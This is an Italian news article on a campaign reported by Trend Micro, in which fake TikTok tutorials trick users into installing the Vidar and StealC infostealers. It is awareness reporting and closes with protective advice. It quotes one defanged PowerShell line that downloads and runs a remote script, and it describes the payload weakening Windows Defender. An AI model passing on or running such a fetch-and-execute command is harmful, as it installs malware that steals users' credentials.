La popolare piattaforma è diventata un vettore per malware aggressivi come Vidar e StealC. Attraverso video tutorial, gli utenti vengono guidati a compiere azioni dannose per i loro dispositivi e che mettono in pericolo la loro sicurezza.

Il mondo del cybercrime continua a evolversi rapidamente e ad affinare le proprie strategie di attacco. Una recente ricerca condotta da Trend Micro ha evidenziato come TikTok stia diventando un nuovo veicolo di diffusione di software dannosi per gli utenti e le aziende. In concreto, gli hacker starebbero sfruttando l’algoritmo della famosa piattaforma, per diffondere su larga scala (centinaia di migliaia di visualizzazioni in pochi giorni), video malevoli mascherati da guide e tutorial. A conferma delle potenzialità del social, alcuni di questi video fake hanno superato il mezzo milione di visualizzazioni.

Gli ultimi attacchi orditi dai cyber criminali hanno sfruttato la viralità dei contenuti TikTok per diffondere malware come Vidar e StealC, progettati per sottrarre informazioni sensibili, tra cui password, dati personali e credenziali finanziarie. Dal punto di vista pratico, l’utente, convinto della innocuità dei contenuti, viene guidato a eseguire comandi dannosi al fine di attivare software legittimi o sbloccare funzionalità premium in applicazioni come Windows OS, Microsoft Office, CapCut e Spotify.

I ricercatori di Trend Micro hanno identificato diversi account TikTok coinvolti in questa campagna, come @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771.

Come funziona l’attacco

Si tratta di strategie particolarmente evolute rispetto a quelle tradizionali – come i siti web compromessi o le email di phishing – e più insidiose, poiché non lasciano alcuna traccia, sulla piattaforma, che possa essere individuata dai sistemi di sicurezza.

I cyber criminali realizzano video per lo più anonimi e spesso realizzati con l’intelligenza artificiale. Per rendere i loro contenuti credibili, utilizzano tecniche avanzate di ingegneria sociale. A tal proposito, un valido esempio – come riporta redhotcyber – è il comando Poweshell, apparentemente legittimo, condiviso dall’account @gitallowed:

iex (irm hxxps://allaivo[.]me/spotify)

In realtà il comando in questione, una volta eseguito dall’utente, innesca una sequenza automatizzata che porta all’istallazione di malware. Nell’ambito di tale processo, sono previste diverse azioni malevole, come la creazione di directory nascoste, la modifica delle impostazioni di Windows Defender – cosicché non venga effettuato il rilevamento di attività anomale – quindi l’installazione di software dannosi come Vidar e StealC.

Le conseguenze del cyber attacco

Le conseguenze di un attacco di questo genere possono essere piuttosto serie: come accennato in apertura, tali malware sono progettati per sottrarre dati sensibili, ma sono anche in grado di mettere a segno un furto di identità o compromettere gravemente i sistemi aziendali.

Alle enormi potenzialità di tali software fa da contraltare la difficoltà dei sistemi di sicurezza della piattaforma TikTok di rilevarli per tempo.

Come proteggersi

La diffusione di malware attraverso TikTok apre le porte a una nuova era del cyber crime. Per difendersi è fondamentale in primis mantenere aggiornati i software di protezione e implementare soluzioni avanzate di sicurezza informatica. Gli esperti suggeriscono inoltre, di adottare un approccio critico ai contenuti online ed evitare in particolare di eseguire comandi indicati nei video presenti sulle varie piattaforme social.